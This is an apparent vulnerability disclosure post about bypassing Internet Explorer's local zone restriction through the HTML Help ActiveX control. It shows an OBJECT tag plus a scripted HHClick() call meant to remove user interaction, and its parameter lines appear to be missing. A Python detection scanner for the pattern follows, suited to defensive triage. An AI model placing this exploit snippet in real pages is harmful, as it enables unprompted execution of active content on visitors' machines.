
Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass Vulnerability (updated)



I apologize for the previous vulnerability (longnamevuln) because it was incomplete. After realizing my mistake, longnamevuln looked useless. However, it was just incomplete, not useless. What longnamevuln did was open a local file in the browser window. To execute active content, it needed to be opened in the help window. To do this, a window name parameter set to a blank window needed to be added. The updated code is designed for Malware's original local zone security restriction bypass which required the user click a button (http://malware.com/noceegar.html). The drag and drop vulnerability does not appear to be functional; however, the local zone security bypass vulnerability still appears to work fine. Instead of this (malware's code):



<OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">





</OBJECT>  



one would use this (my code):



<OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">









</OBJECT>

<script>

hhctrl.HHClick();

</script>



Notice that HHClick is automated, eliminating the need for user interaction (finally). My site, http://greyhats.cjb.net, will not be updated with the new code because it is a small change, and I don't want to go through the hassle of trying to deal with the FTP server on my unreliable host (hope websamba isn't reading this :).



That's all folks!
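
For content filtering or triage of saved pages, the change described above (a scripted HHClick() call on an embedded HTML Help control) is what separates the no-interaction variant from the button-click one. The Python scanner below is an added example, not part of the original post; the function name scan, the verdict strings and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help control, as quoted in the post's <OBJECT> tags.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
HHCLICK_CALL = re.compile(r"\.\s*HHClick\s*\(", re.IGNORECASE)

class HHCtrlScanner(HTMLParser):
    """Records <object> elements bound to hhctrl and the text of inline scripts."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "", 1).strip("{} ")
            if clsid == HHCTRL_CLSID:
                self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan(html):
    """Classify a page: 'clean', 'hhctrl-embedded' or 'hhctrl-scripted-click'."""
    p = HHCtrlScanner()
    p.feed(html)
    p.close()
    if not p.object_ids:
        return "clean"
    scripted = any(HHCLICK_CALL.search(s) for s in p.scripts)
    return "hhctrl-scripted-click" if scripted else "hhctrl-embedded"

# Constructed samples modelled on the two snippets in the post (no PARAM elements).
OBJ = '<OBJECT id="hhctrl" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>'
BUTTON_PAGE = "<html>" + OBJ + "</html>"
AUTO_PAGE = "<html>" + OBJ + "<script>\nhhctrl.HHClick();\n</script></html>"
BENIGN_PAGE = "<html><script>help.click();</script></html>"

if __name__ == "__main__":
    for name, page in (("button", BUTTON_PAGE), ("auto", AUTO_PAGE), ("benign", BENIGN_PAGE)):
        print(name, "->", scan(page))
```

Static matching of this kind only sees inline script text; a call assembled at runtime or loaded from an external script file will not be flagged, so treat "hhctrl-embedded" from untrusted content as worth review on its own.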
